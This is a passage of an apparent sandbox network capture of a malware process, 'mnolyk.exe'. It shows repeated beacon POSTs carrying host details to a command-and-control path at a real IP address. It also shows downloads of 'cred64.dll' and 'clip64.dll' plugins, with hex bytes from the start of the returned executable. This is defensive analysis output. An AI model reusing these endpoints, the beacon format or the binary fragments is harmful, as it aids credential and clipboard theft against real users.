                          Feb 7, 2023 20:04:18.424609900 CET5047880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:18.482635975 CET805047962.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:18.484904051 CET805047962.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:18.485033035 CET5047980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:18.596962929 CET5047980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:18.597832918 CET5048080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:18.656768084 CET805047962.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:18.657004118 CET5047980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:18.658252001 CET805048062.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:18.658396959 CET5048080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:18.662379026 CET5048080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:18.722606897 CET805048062.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:18.724710941 CET805048062.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:18.724860907 CET5048080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:18.831243038 CET5048080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:18.832638979 CET5048180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:18.891714096 CET805048062.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:18.891803026 CET805048162.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:18.891829967 CET5048080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:18.891963959 CET5048180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:18.893120050 CET5048180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:18.952367067 CET805048162.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:18.956362963 CET805048162.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:18.956444025 CET5048180192.168.2.662.204.41.4
                          • 62.204.41.4
                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          0192.168.2.64971862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:50.878460884 CET8OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:50.942157030 CET9INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:50 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          1192.168.2.64971962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:50.895771027 CET9OUTGET /Gol478Ns/Plugins/cred64.dll HTTP/1.1
                          Host: 62.204.41.4
                          Feb 7, 2023 20:00:50.958431959 CET9INHTTP/1.1 404 Not Found
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:50 GMT
                          Content-Type: text/html
                          Content-Length: 162
                          Connection: keep-alive
                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                          Feb 7, 2023 20:00:51.114259005 CET10OUTGET /Gol478Ns/Plugins/clip64.dll HTTP/1.1
                          Host: 62.204.41.4
                          Feb 7, 2023 20:00:51.177059889 CET11INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:51 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 91136
                          Last-Modified: Fri, 03 Feb 2023 17:19:21 GMT
                          Connection: keep-alive
                          ETag: "63dd4219-16400"
                          Accept-Ranges: bytes
                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 18 8f 2c 43 79 e1 7f 43 79 e1 7f 43 79 e1 7f 18 11 e2 7e 49 79 e1 7f 18 11 e4 7e cb 79 e1 7f 18 11 e5 7e 51 79 e1 7f 96 14 e5 7e 4c 79 e1 7f 96 14 e2 7e 52 79 e1 7f 96 14 e4 7e 62 79 e1 7f 18 11 e0 7e 46 79 e1 7f 43 79 e0 7f 19 79 e1 7f d8 17 e8 7e 40 79 e1 7f d8 17 e1 7e 42 79 e1 7f d8 17 1e 7f 42 79 e1 7f d8 17 e3 7e 42 79 e1 7f 52 69 63 68 43 79 e1 7f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d4 38 dd 63 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 de 00 00 00 8c 00 00 00 00 00 00 00 3e 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 01 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 4a 01 00 9c 00 00 00 3c 4b 01 00 3c 00 00 00 00 80 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 54 10 00 00 20 3f 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 3f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 dd 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 61 00 00 00 f0 00 00 00 62 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 14 00 00 00 60 01 00 00 0c 00 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 80 01 00 00 02 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 54 10 00 00 00 90 01 00 00 12 00 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$,CyCyCy~Iy~y~Qy~Ly~Ry~by~FyCyy~@y~ByBy~ByRichCyPEL8c!>@J<K<T ?p?@,.textV `.rdataab@@.dataD`D@.rsrcP@@.relocTR@B
                          Feb 7, 2023 20:00:51.177088976 CET12INData Raw: 00 00 00 00 6a 20 68 a8 3c 01 10 b9 70 68 01 10 e8 3f 23 00 00 68 00 ea 00 10 e8 8c 2a 00 00 59 c3 cc cc cc 6a 38 68 cc 3c 01 10 b9 88 68 01 10 e8 1f 23 00 00 68 60 ea 00 10 e8 6c 2a 00 00 59 c3 cc cc cc 6a 38 68 cc 3c 01 10 b9 a0 68 01 10 e8 ff
                          Data Ascii: j h<ph?#h*Yj8h<h#h`l*Yj8h<h"hL*Yj8h<h"h ,*Yj8h=h"h*Yj0hD=h"h)Yj0hx=i"h@)Yhh=i
                          Feb 7, 2023 20:00:51.177117109 CET14INData Raw: 7d f0 10 8d 45 dc 0f 43 45 dc 0f be 04 18 8b 04 81 83 f8 ff 74 27 c1 e6 06 03 f0 83 c7 06 78 18 8b cf 8b c6 d3 f8 8b 4d f4 50 e8 1f 1b 00 00 8b 55 ec 83 ef 08 8b 4d f8 43 3b da 72 c2 8b 45 f8 85 c0 74 0e 68 00 04 00 00 50 e8 f0 21 00 00 83 c4 08
                          Data Ascii: }ECEt'xMPUMC;rEthP!Ur(MBrI#+wVRQ!UEEEr(MBrI#+wRQ~!E_^[]GU4E0SVW3E
                          Feb 7, 2023 20:00:51.177145004 CET15INData Raw: 23 52 51 e8 31 1d 00 00 83 c4 08 33 f6 e9 74 ff ff ff 52 51 e8 20 1d 00 00 83 c4 08 5f 8b c6 5e 8b e5 5d c3 e8 3f 43 00 00 e8 4a 1a 00 00 cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 18 8b 55 1c 8b 4d 08 56 85 c0 0f 84 82 00 00 00 53 40 57 50
                          Data Ascii: #RQ13tRQ _^]?CJUQEUMVS@WP] M}CM+IDuNFu+FVjVSWP5WjWj UM_[^r%BrI#+wRQ
                          Feb 7, 2023 20:00:51.177177906 CET16INData Raw: 10 72 2d 8b 4c 24 40 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 f8 10 00 00 52 51 e8 06 18 00 00 83 c4 08 8b 0d e4 68 01 10 83 f9 10 72 2e a1 d0 68 01 10 41 81 f9 00 10 00 00 72 16 8b 50 fc 83 c1 23 2b c2 83
                          Data Ascii: r-L$@BrI#+RQhr.hArP#+QPD$`hhL$Dh~D$tfhQT$DL$dT$Xr-L$@BrI#+PRQ^hr.hArP
                          Feb 7, 2023 20:00:51.177210093 CET18INData Raw: 00 00 8a 41 02 3a 42 02 75 0f 83 7c 24 1c ff 74 7b 8a 41 03 3a 42 03 74 73 83 ff 25 73 6e 83 ce 02 c7 44 24 50 00 00 00 00 b9 01 00 00 00 89 74 24 18 3b f9 c7 44 24 54 0f 00 00 00 8d 44 24 20 c6 44 24 40 00 0f 42 cf 83 7c 24 34 10 51 0f 43 44 24
                          Data Ascii: A:Bu|$t{A:Bts%snD$Pt$;D$TD$ D$@B|$4QCD$$L$DPT$TD$@L$@C|$Pu81u|$0D$|$0L$@T$TD$D$t9D$r-BrI#+LRQZD$ T$tD$r-L$`B
                          Feb 7, 2023 20:00:51.177238941 CET19INData Raw: 6c 8b c7 83 e8 04 89 44 24 1c 72 19 8b 01 3b 02 75 1c 8b 44 24 1c 83 c1 04 83 c2 04 83 e8 04 89 44 24 1c 73 e7 83 f8 fc 0f 84 bd 00 00 00 8a 01 3a 02 75 39 83 7c 24 1c fd 0f 84 ac 00 00 00 8a 41 01 3a 42 01 75 26 83 7c 24 1c fe 0f 84 99 00 00 00
                          Data Ascii: lD$r;uD$D$s:u9|$A:Bu&|$A:Bu|$A:Bt~GwvD$Pt$;D$TD$ D$@B|$4QCD$$L$DPT$TD$@L$@C|$Pu0xf90u|$0D$|$0L$@T$T
                          Feb 7, 2023 20:00:51.177269936 CET20INData Raw: fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 f1 01 00 00 52 51 e8 ff 08 00 00 83 c4 08 80 7c 24 17 00 74 17 83 ec 18 8b cc 68 00 69 01 10 e8 35 04 00 00 e8 e0 eb ff ff 83 c4 18 8b 74 24 18 83 ec 18 8b cc 81 ce 00 10 00 00
                          Data Ascii: rI#+RQ|$thi5t$t$0hiL$xWxr|$4L$ CL$ ;xudD$r;uD$D$s:u1|$A:Bu|$tzA:Bu|$tkA:Btc_u^
                          Feb 7, 2023 20:00:51.177303076 CET22INData Raw: 0e 50 57 51 e8 41 1d 00 00 8b 45 08 83 c4 0c 89 46 10 8b c6 89 5e 14 5f 5e 5b 5d c2 04 00 e8 97 de ff ff e8 22 2a 00 00 cc cc 55 8b ec 51 53 56 8b f1 57 8b 7d 0c 8b 4e 14 89 4d fc 3b f9 77 28 8b de 83 f9 10 72 02 8b 1e 57 ff 75 08 89 7e 10 53 e8
                          Data Ascii: PWQAEF^_^[]"*UQSVW}NM;w(rWu~S";_^[]v+;v;BC=r%H#;QtwA#HtPm3WuEP~^
                          Feb 7, 2023 20:00:51.177334070 CET23INData Raw: 00 50 e8 bc 2e 00 00 59 85 c0 74 03 32 c0 c3 e8 a2 30 00 00 b0 01 c3 6a 00 e8 d0 00 00 00 84 c0 59 0f 95 c0 c3 e8 cc 0c 00 00 84 c0 75 03 32 c0 c3 e8 0c 35 00 00 84 c0 75 07 e8 c2 0c 00 00 eb ed b0 01 c3 e8 04 35 00 00 e8 b3 0c 00 00 b0 01 c3 55
                          Data Ascii: P.Yt20jYu25u5Uu}uuMPu,Uuu'YY]cth,j3Y!+*j4YnU}u(jOu2]T4uj%Y]U=
                          Feb 7, 2023 20:00:51.239826918 CET25INData Raw: 00 00 00 53 57 ff 75 08 e8 b1 f8 ff ff 8b f0 89 75 e4 83 ff 01 75 22 85 f6 75 1e 53 50 ff 75 08 e8 99 f8 ff ff 53 56 ff 75 08 e8 64 fd ff ff 53 56 ff 75 08 e8 6a 00 00 00 85 ff 74 05 83 ff 03 75 48 53 57 ff 75 08 e8 47 fd ff ff 8b f0 89 75 e4 85
                          Data Ascii: SWuuu"uSPuSVudSVujtuHSWuGut5SWuD$MQ0h:uuue3uEMdY_^[UV5u3@uuu,^]U}uuuu]


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          10192.168.2.64972862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:53.301054955 CET115OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:53.365572929 CET115INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:53 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          100192.168.2.64982162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:17.548024893 CET227OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:17.612590075 CET227INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:17 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          101192.168.2.64982262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:17.781117916 CET228OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:17.844888926 CET228INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:17 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          102192.168.2.64982362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:18.077794075 CET229OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:18.141810894 CET229INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:18 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          103192.168.2.64982462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:18.327899933 CET230OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:18.389848948 CET230INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:18 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          104192.168.2.64982562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:18.559731960 CET231OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:18.625855923 CET231INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:18 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          105192.168.2.64982662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:18.795279980 CET232OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:18.859751940 CET232INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:18 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          106192.168.2.64982762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:19.034168005 CET233OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:19.099330902 CET233INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:19 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          107192.168.2.64982862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:19.281462908 CET234OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:19.346347094 CET234INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:19 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          108192.168.2.64982962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:19.514062881 CET234OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
